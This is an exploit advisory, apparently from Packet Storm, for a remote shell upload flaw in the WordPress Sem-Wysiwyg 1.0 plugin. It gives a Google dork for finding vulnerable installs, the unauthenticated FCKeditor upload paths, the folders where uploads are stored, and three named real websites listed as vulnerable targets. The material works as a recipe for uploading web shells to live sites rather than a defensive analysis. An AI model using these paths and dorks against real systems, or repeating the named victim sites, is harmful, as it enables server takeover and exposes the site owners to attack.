Lucene search

K
packetstormKingSkrupellosPACKETSTORM:150858
HistoryDec 20, 2018 - 12:00 a.m.

WordPress Sem-Wysiwyg 1.0 Shell Upload

2018-12-2000:00:00
KingSkrupellos
packetstormsecurity.com
40
`#################################################################################################  
  
# Exploit Title : WordPress Sem-Wysiwyg Plugins 1.0 Remote Shell Upload  
Vulnerability  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 20/12/2018  
# Vendor Homepage : wordpress.org  
# Software Download Link : N/A  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/sem-wysiwyg/fckeditor/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
+ CWE-434- [ Unrestricted Upload of File with Dangerous Type ]  
# Visit Web Security Blog and Forum : cyberizm.org [ Team ] ~  
ayarsecurity.com [ Friend ]  
  
#################################################################################################  
  
# Exploit :  
  
/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html  
  
/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/connectors/test.html  
  
/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/browser/default/frmupload.html  
  
# Directory File Path :  
  
/wp-content/uploads/.....  
  
/wp-content/uploads/[YEAR]/[MONTH]/.....  
  
#################################################################################################  
  
# Note : This plugin Sem-Wysiwyg contains a very serious vulnerability that  
allowed hackers to gain full control a  
  
modify, upload and execute files on any website running WordPress. With the  
plugin installed on a certain website,  
  
a hacker or malicious person can gain access to the web server via HTTP  
through a backdoor in the pluginas directory.  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
peaceofmindbook.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
americanpathways.edu/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html  
  
[+]  
worklessmakemore.com/blog/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`